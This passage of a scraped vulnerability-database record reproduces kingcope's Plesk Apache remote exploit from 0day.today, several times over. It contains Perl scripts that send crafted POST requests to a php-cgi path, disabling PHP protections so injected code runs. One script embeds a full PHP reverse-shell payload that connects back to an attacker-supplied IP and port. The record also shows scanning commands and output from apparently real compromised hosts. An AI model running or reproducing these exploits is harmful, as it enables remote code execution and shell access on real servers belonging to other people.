\"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\" \r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk-simple.pl\r\n \r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). 
\"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\nsub usage {\r\n print \"usage: $0 <target> <http/https> <local_ip> <local_port>\\n\";exit;\r\n}\r\nif (!defined($ARGV[3])){usage();}\r\n$target=$ARGV[0];\r\n$proto=$ARGV[1];\r\nif ($proto eq \"http\") {\r\n$sock = IO::Socket::INET->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n}elsif ($proto eq \"https\") {\r\n$sock = IO::Socket::SSL->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n}else {usage();}\r\n$lip=$ARGV[2];\r\n$lport=$ARGV[3];\r\n$pwn=\"<?php echo \\\"Content-Type: text/plain\\r\\n\\r\\n\\\";set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip =\r\n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null;\r\n\\$error_a = null; \\$shell = '/bin/sh -i'; \\$daemon =\r\n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid =\r\npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't 
fork\\\");\r\nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) {\r\nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else {\r\nprintit(\\\"WARNING: Failed to daemonise. This is quite common and not\r\nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port,\r\n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\");\r\nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 =>\r\narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process =\r\nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if\r\n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\");\r\nexit(1);}stream_set_blocking(\\$pipes[0],\r\n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2],\r\n0);stream_set_blocking(\\$sock, 0);while (1) { if (feof(\\$sock)) {\r\nprintit(\\\"done.\\\"); break;} if\r\n(feof(\\$pipes[1])) {printit(\\\"done.\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1],\r\n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a,\r\n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug)\r\nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock,\r\n\\$chunk_size);if(\\$debug) printit(\\\"SOCK:\r\n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input =\r\nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT:\r\n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input =\r\nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR:\r\n\\$input\\\");fwrite(\\$sock,\r\n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print\r\n\\\"\\$string\\n\\\";}}\r\n?>\";\r\n$arguments=uri_escape(\"-d\",\"\\0-\\377\"). 
\"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path=uri_escape(\"phppath\",\"\\0-\\377\"). \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\".\r\n \"Host: $ARGV[0]\\r\\n\".\r\n \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\".\r\n \"Content-Type: text/plain\\r\\n\".\r\n \"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\". 
$pwn;\r\nwhile(<$sock>){print $_;};\r\n \r\n \r\n###############################################################################################################\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/20857", "title": "Plesk Apache Zeroday Remote Exploit", "type": "zdt", "viewCount": 10}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:39:46"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "399c17419a0861907ead8d99aad2faef"}, {"key": "href", "hash": "340deb420b1b666cc751f41ff0431610"}, {"key": "modified", "hash": "9004ff9499dbe9cd635619a237c378aa"}, {"key": "published", "hash": "9004ff9499dbe9cd635619a237c378aa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d3538c8c4b95b86a156cb12625fdc9b4"}, {"key": "sourceData", "hash": "fb085c5503470bd6431f8b6128eedcc9"}, {"key": "sourceHref", "hash": "94160decc0c612e32a01ba51f53d8380"}, {"key": "title", "hash": "8b176874af3b304cf5864dda846aa071"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "a6ad642a72bcfd4f307db3e60257a04f205bdd923cec363b0f75749e4651ef8a", "viewCount": 10, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/20857", "sourceData": "Plesk Apache zeroday / June 2013\r\ndiscovered & exploited by kingcope\r\n \r\n \r\nthis Plesk configuration setting makes it possible:\r\nscriptAlias /phppath/ \"/usr/bin/\"\r\nFurthermore this is not cve-2012-1823 because the php interpreter is called directly.\r\n(no php file is called)\r\n \r\nParallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution\r\nAffected and tested: Plesk 9.5.4\r\n Plesk 9.3\r\n Plesk 9.2\r\n Plesk 9.0\r\n Plesk 
8.6\r\nDiscovered & Exploited by Kingcope / June 2013\r\nAffected and tested OS: RedHat, CentOS, Fedora\r\nAffected and tested Platforms: Linux i386, Linux x86_64\r\nUntested OS: Windows (php.exe?)\r\nUnaffected: 11.0.9 due to compiled in protection of PHP version\r\nTraces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] \"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%\r\n6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%\r\n62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%\r\n3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\" 200 203 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\r\nShodanhq overview of Plesk on Linux:\r\nhttp://www.shodanhq.com/search?q=plesklin\r\n \r\nperl plesk-simple.pl <ip address>\r\n...\r\n...\r\n...\r\nOK\r\nLinux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24\r\n 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n---\r\n./pnscan -w\"GET /phppath/php HTTP/1.0\\r\\n\\r\\n\" -r \"500 Internal\" 76.12.54.163/16 80\r\nperl plesk-simple.pl 76.12.81.206\r\nHTTP/1.1 200 OK\r\nDate: Sat, 16 Mar 2013 13:39:35 GMT\r\nServer: Apache/2.2.3 (CentOS)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n77\r\nLinux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E\r\nST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n3e\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n \r\n0\r\n \r\nperl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Mar 2013 15:29:28 GMT\r\nServer: Apache/2.0.54 (Fedora)\r\nConnection: 
close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n3\r\nOK\r\n \r\n60\r\nLinux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux\r\n \r\n4c\r\nuid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)\r\n \r\n0\r\n \r\n \r\n \r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). 
\"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n###############################################################################################################\r\n \r\nplesk-simple-ssl.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). 
\"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\" \r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk-simple.pl\r\n \r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . 
uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\nsub usage {\r\n print \"usage: $0 <target> <http/https> <local_ip> <local_port>\\n\";exit;\r\n}\r\nif (!defined($ARGV[3])){usage();}\r\n$target=$ARGV[0];\r\n$proto=$ARGV[1];\r\nif ($proto eq \"http\") {\r\n$sock = IO::Socket::INET->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n}elsif ($proto eq \"https\") {\r\n$sock = IO::Socket::SSL->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n}else {usage();}\r\n$lip=$ARGV[2];\r\n$lport=$ARGV[3];\r\n$pwn=\"<?php echo \\\"Content-Type: text/plain\\r\\n\\r\\n\\\";set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip =\r\n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null;\r\n\\$error_a = null; \\$shell = '/bin/sh -i'; \\$daemon =\r\n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid =\r\npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\");\r\nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) {\r\nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else {\r\nprintit(\\\"WARNING: Failed to daemonise. 
This is quite common and not\r\nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port,\r\n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\");\r\nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 =>\r\narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process =\r\nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if\r\n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\");\r\nexit(1);}stream_set_blocking(\\$pipes[0],\r\n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2],\r\n0);stream_set_blocking(\\$sock, 0);while (1) { if (feof(\\$sock)) {\r\nprintit(\\\"done.\\\"); break;} if\r\n(feof(\\$pipes[1])) {printit(\\\"done.\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1],\r\n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a,\r\n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug)\r\nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock,\r\n\\$chunk_size);if(\\$debug) printit(\\\"SOCK:\r\n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input =\r\nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT:\r\n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input =\r\nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR:\r\n\\$input\\\");fwrite(\\$sock,\r\n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print\r\n\\\"\\$string\\n\\\";}}\r\n?>\";\r\n$arguments=uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). 
\"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path=uri_escape(\"phppath\",\"\\0-\\377\"). \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\".\r\n \"Host: $ARGV[0]\\r\\n\".\r\n \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\".\r\n \"Content-Type: text/plain\\r\\n\".\r\n \"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\". $pwn;\r\nwhile(<$sock>){print $_;};\r\n \r\n \r\n###############################################################################################################\n\n# 0day.today [2018-03-17] #"}
{"result": {}}